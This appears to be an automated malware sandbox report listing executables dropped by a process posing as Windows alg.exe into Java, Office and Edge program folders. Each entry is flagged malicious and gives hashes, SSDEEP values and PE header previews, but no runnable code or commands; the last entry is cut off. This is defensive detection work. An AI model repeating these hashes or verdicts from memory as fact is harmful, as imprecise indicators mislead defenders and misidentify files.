Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................e........................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1242112
Entropy (8bit):	5.172672290306208
Encrypted:	false
SSDEEP:	12288:OYdP/FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fdP/FsqjnhMgeiCl7G0nehbGZpbD
MD5:	0005D380019F1E508460611634037C81
SHA1:	8B1F904EBC73F19F65B31C1BB15DEEC1BDFBC41A
SHA-256:	02278A7D2E58E191D5E6903E9AA14941013AD9C4E75CAE189D7BC3692F0F9555
SHA-512:	807CADF953891F9DBD2AED364E40437A94FAD6F80C3E657440F2A01AC7113812577573E0A442E960AC0784CC6C1221B6BE6FA39CADA92F02FE868FFA86A3CDED
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032912644486642
Encrypted:	false
SSDEEP:	12288:Wy5uXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:LgsqjnhMgeiCl7G0nehbGZpbD
MD5:	BFB2718A897A2F2C84EB1A5163ADE662
SHA1:	4DEDAC353102079D7A723C6B8530F39AABEDB5E4
SHA-256:	DE405670B48D0C94CCE81C06C89429AE99842B7F40A324C41E0163FC500CFF08
SHA-512:	3FE78111AF2F9883B11C1990FE6004FF1CC990C4584B01BFE6A72CB1605D727072B235D8C8ADC24293E0BC99C5D7BE01C8DD57E3347EC725DFC94BB385D2AA00
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032965855262283
Encrypted:	false
SSDEEP:	12288:VKlmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EUsqjnhMgeiCl7G0nehbGZpbD
MD5:	C112FEC5EFEFFECD22DD5A3D09399B84
SHA1:	0EC5A58CDB873AC4F25E61A11157B800D8A95EDB
SHA-256:	10534F6160D0FA22C5F8695FA5588E745BC4AF40F44CC2DA2EE5DD8A9E6E1C6C
SHA-512:	E3A9EC0E1040574D0A1EA2247765BCB314601D56EB0314FEB52C3808FC2B819CF6EED1292ABCE4453018098112958197A6AFAF487815F84CB8DE7EECF0746444
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................~........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032977674877819
Encrypted:	false
SSDEEP:	12288:jilmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GUsqjnhMgeiCl7G0nehbGZpbD
MD5:	3182F9958624AF385606353D49774CA4
SHA1:	5935C6769FB89D79909E564357C5D820CB2FE8CF
SHA-256:	07EC7DFFC99031332528F64075AB6630061E8ABA27025C52510BEE1CD4184132
SHA-512:	6327A8C13826CA8290B2D67868C5B8D5AE84BF0E28C8F7D16515EBE2382A823F94D605E964A5204CC6027D7EDC9AA53E7C2738BACC353BFBD4C300C48C32BE05
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................?.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032955771165384
Encrypted:	false
SSDEEP:	12288:OTmGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:4bsqjnhMgeiCl7G0nehbGZpbD
MD5:	0FBEA476C7887B512F00E90ED9A87292
SHA1:	200AEB90D14FF51CE2003D6CD93A955E2E90092F
SHA-256:	CC7CCD16B498975332EA70C7F4FB4D099AF03D7C753BD76CA5F452209F47E4A7
SHA-512:	F64568E87EFB7D2494DB1A311F04C9DFA416268B27CAD980486561639F8D9B03FF4084EE42F5C63E05550844C1DF12B7F80D540F17694B26B930A91A0E0E3A66
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................Z.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.033868922760368
Encrypted:	false
SSDEEP:	12288:tamaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:UXsqjnhMgeiCl7G0nehbGZpbD
MD5:	16F0CCDD53206F6140D517CD975B4973
SHA1:	796675D5EA3B3903A096C12C29C05B1C57C25F37
SHA-256:	C402EE503BC5FF4FF318A74F30972D0D82CCC0EF3866F32CF9E707A6285F3969
SHA-512:	984B902AAA91907BEB2587F5B08741A46B1A250E4D531E22AA70925FA16E30D334D1C4D27AD8EF20F09469B9873D6F3FB6BF8B44ABFB6990242B7B8F8B63E10C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032937125450705
Encrypted:	false
SSDEEP:	12288:XQ5uXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AosqjnhMgeiCl7G0nehbGZpbD
MD5:	776BD55BCDEDBABAFDD02B461F71957C
SHA1:	910057DE26B834534592ADEE697FC487424493E7
SHA-256:	6CC22C850EB1905E22AB44E50463BD5F2FEBDEEDE256A8744C4CE28010D45425
SHA-512:	F1C93CE2C3ED813803CC6C987094554AB5383552BC54F7D2B16C44995922BC16557F1F854019C80D8047875D16ABF8A4E24DE6928E63F89B44B04C8F90700A84
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032969899897651
Encrypted:	false
SSDEEP:	12288:UV/mXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q+sqjnhMgeiCl7G0nehbGZpbD
MD5:	0E81B6573B83AA8793D9E8D651EFED48
SHA1:	F891026855C295DD066F82B10E4AC7F2F4F60DAA
SHA-256:	555306718424A1E1CC19508C3D460C6CEAE0D22087E3ED91885598F6CE95947E
SHA-512:	C463471FA82F35AE0E24C9EAB30B6675170D9D296DE44CA5607E32894FE0D04AB0DE1A1DE058F7CF2286693810AFEA91C513C58335283F5BAF05B4C91E328A61
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.03287404173506
Encrypted:	false
SSDEEP:	12288:9Zm2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7bsqjnhMgeiCl7G0nehbGZpbD
MD5:	B8293E47EB931464529F868DEC040543
SHA1:	58152D388848EBEFA7AE75777ACB529A2DEED17E
SHA-256:	3DE369F2C752002D931D076DDC91F94ABC81716D5C99CEEE0AC27C78A322F192
SHA-512:	1B7151D131E91C582B595D4AAE172EE7C2CF3A13F79CAFB9E735DBBCE50F2EB1756277DEA430559659AAD767C84850A953333D9CA558267315184E38B4B25F84
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................u........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032916892979493
Encrypted:	false
SSDEEP:	12288:ueSOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3PsqjnhMgeiCl7G0nehbGZpbD
MD5:	D8CDCEE8587CC4BC71AFBE257979EADB
SHA1:	7B5B6DB38EAAE211A755BC90D43CE284AD7D883C
SHA-256:	6415C345F5F864DAA199399C4F3BB17A1CF4ADE3B16CB2B9F1531C0BE308C36F
SHA-512:	4D747806AFDD2944FE6C29CC556E1950EC52B6B4ACA7D492D5467B8D58BAAA4400EB50293D08DD226F2CC64D3F5A787136D6EC5A5DF00E22287C086C875CD50F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................x.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032986252233522
Encrypted:	false
SSDEEP:	12288:M5/mXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:8+sqjnhMgeiCl7G0nehbGZpbD
MD5:	ACCF94EED67FF819B0946B3B3CE530B1
SHA1:	890015656D407E65D8C8F003AA2D09C695F65431
SHA-256:	914E3F33BAECF2E150CA5624D0EE84F1D49531D6AFC922BC73BC8A4A1635E1CA
SHA-512:	7A943046EF7280AC1DA1B116DD7369A4C6A4E674D26FC68F52C010F56960FED7F2B638641A68443D49E269D9193BA7E0AD587187A3B73393AEEA388121A847C4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................!1.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1202688
Entropy (8bit):	5.09805467794622
Encrypted:	false
SSDEEP:	12288:F7IXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:F7IsqjnhMgeiCl7G0nehbGZpbD
MD5:	BECE7503258CB22ED292B3577ED80D90
SHA1:	ADF5CB5A341354CA8ADBBEE4955094C1E23B1A28
SHA-256:	327258A0791FB466FF12C4AB5CF6DDBD75F085991A4F3FC18BA1D6BBFCA63B5F
SHA-512:	478D4DAE816730C7F2DCF55547D9238B572F7BEB30D0FB0143C410AE22FD67AE192E518A938CDFA3645100168E3D607E0C34CE3F3B998046CBE8899C3A872403
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@.................................}...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142784
Entropy (8bit):	5.032320315147181
Encrypted:	false
SSDEEP:	12288:kKQKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5ZsqjnhMgeiCl7G0nehbGZpbD
MD5:	7B6F7F8714E8173A7563D060C621600D
SHA1:	6D09D0ECA3BACC3CAC092F04DBBE0090AA2C8640
SHA-256:	60C31F3C7F6E231A0710364648E60759139D4C19968F41D8E9B1F59200D7E5A5
SHA-512:	9CB5370DBC893661EF771ED57C28E6E5EDE2D8FB12A82675EF8EBD29A22D2BA1572DE8D1554D0A65B4D942BB6E99D8606274D3F5F7B87820563704DE132FC848
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................B........................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1298944
Entropy (8bit):	5.249102660036012
Encrypted:	false
SSDEEP:	24576:Wi7l/3roAEsqjnhMgeiCl7G0nehbGZpbD:dl/roAgDmg27RnWGj
MD5:	643811BFA4723BC7A8732638D6436BFE
SHA1:	B2C71C900561EAD634F14989D6640E50C3EBD7F8
SHA-256:	39D4AD768E065DAA82C0C30D30808FDB247746212CDFC70DC7E2A038733C3C54
SHA-512:	865B782FA3212BC4027B0E0ABA29D3181E48BAB76F3DEF7B306A827646F5F6ECB3A7A8347810555C1160971C8223E9B8D24CE05175B69449E3FD75A89A581513
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0.......'..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1269248
Entropy (8bit):	5.286877621209426
Encrypted:	false
SSDEEP:	12288:35bfQnWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3NfQnWsqjnhMgeiCl7G0nehbGZpbD
MD5:	18BD510F2758D947C675253BD8188DB1
SHA1:	981D8B6BC8E0E7F6345DF18A9914E7986A097C97
SHA-256:	0B7BAC195BAFB42CFB83ED8D409B5482E9D69A9F562720276DA7320419B5AC0B
SHA-512:	3C680E4A452978687DDA2411A6690FAEFF7159214E0CBC9DC69843946F7097973E8046A5BB8173586363C5545179B6E49C352FB26F849D143011845A65E5184F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.................................\|.......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.303350458726013
Encrypted:	false
SSDEEP:	12288:vNmt0LDILi21RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:yLiSsqjnhMgeiCl7G0nehbGZpbD
MD5:	38E3CEFF4195777C55C734129C32E142
SHA1:	2CD50EA7BD65FA662749364337B9A72C27A9D9FF
SHA-256:	B57FACBEFEDA399A1DCA25FA5BD9334039EE3E976703F1011DE3F4016BAFAB03
SHA-512:	1DE743315111F6DE902CFA7723D88EC373E19D67ED8C881B76EF0DACF43367C5F1B383C91B3E648ADFC486792750E6EE424AA9733F1CD2062355A61655ED0F31
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................S........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.303338257385308
Encrypted:	false
SSDEEP:	12288:1Nmt0LDILi21RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:gLiSsqjnhMgeiCl7G0nehbGZpbD
MD5:	F5F4C5093C690681A47A3C7519261B4B
SHA1:	F75334B2F0E606C337B3258737ACCDCF861E81F3
SHA-256:	454A1867C7093D0C9771ABC6F3AD59F3869516FB4453869110A7BE1F75EF3AC3
SHA-512:	F7BEA1BC68C7C4A46E368EBC4DB0E64F643BDF60C3A88B8B323EC47E54DE615FCC0888CBB0AE2EC1CF441AB722830FE33E444F6A1E341472B98D5A36A97ED70E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................#=........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1343488
Entropy (8bit):	5.236041219337651
Encrypted:	false
SSDEEP:	12288:XjuozQMGNUbTuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:TfSsqjnhMgeiCl7G0nehbGZpbD
MD5:	12F1CA66776CA8EEBB914B46EA2AB313
SHA1:	CE7B34EB4A9BE06B2653F292D28F859B2D2BE12D
SHA-256:	036690C2F1174DECB96A5C1FDFDC1A3B43FB2931EEE2DA1274889FF0FA610805
SHA-512:	164C065C3C95B5AD0EF4E978AF1371C8DE1E16597F81EC9F9A733E21AA2287DA4A599E139A68D76DD4507FBEBEDFF2A66FBA3C157C4D4F0A30F2CA02BE216E1D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@....................................WE.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1496064
Entropy (8bit):	5.577929524243078
Encrypted:	false
SSDEEP:	24576:pbUO42i/EPsqjnhMgeiCl7G0nehbGZpbD:pJzDmg27RnWGj
MD5:	00B71898B5B8BD1DD579F7ED88075D89
SHA1:	5526DF390405F2EEFD23EEBB6790A048857D073C
SHA-256:	85D668D75FD32535236341054FB20F4B114F96214607D58F5B73CCB2FF713F96
SHA-512:	E34158FD8FD4AEEBDAD73EE6479B1EB1E08AD988477C6B9D601B63CAB81411D540C468ECFD2B5502993D023D8D5CD42A0182FB5B55BD7F4E23E97BAA3058EC99
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@.......................... ......93........... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.961838893702152
Encrypted:	false
SSDEEP:	1572864:uLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:yicZmsR3Lo/cnLe
MD5:	BC43FD88B704E3B9AA1B86F0592061D7
SHA1:	E6B69D7697D30A562BDD29B7A892325B4FB83D20
SHA-256:	74707FE667F1B5486D0871863C87D5F4F5048F5D953164A0795A64F8F630B1D5
SHA-512:	55B5CCF28850B160904C7627413E6C8B91F35C2D3D10126734B77C516CD5C4B814435FA51348EA81EDCBD1418328A5E34818BDA16F477B15B6A8F1CF75EEAF85
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.811117893988186
Encrypted:	false
SSDEEP:	98304:ilkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLeD527BWG:0kkCqaE68eV+0ynE6LeVQBWG
MD5:	70F6B4A3CBD986B5A96FEE819C040596
SHA1:	4348F0E9991EE04F2175704B65D44D5B248A9AC3
SHA-256:	3FCC0F94B56639C36152ECB60C058ED8685099AE800649FDFF34F3DA6D39574A
SHA-512:	1C6511E064247EAB0EF73A2A4A24747CDB74B3BE5E51C614581D2ED226A744866D936432427EE4D41889B5F8F9BAC37D11F4A7FF6540E492B5A87324DC522E32
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ....Z........%......`+...@..........................pL.....G.L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text............................. ..`.rdata........+....................@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1657344
Entropy (8bit):	5.635144674884148
Encrypted:	false
SSDEEP:	24576:wE8DMeflpnIOvYUwsqjnhMgeiCl7G0nehbGZpbD:wtDD9pnIOWDmg27RnWGj
MD5:	7E9DAA0B26E7FF7C3471C54069DCD3B7
SHA1:	154BF6E1FEC16A62781CE84D31009F933A983F44
SHA-256:	B278263C009F31129CB736D55B3C4D60FEE353501DEDFCEF221759449AFBE6B6
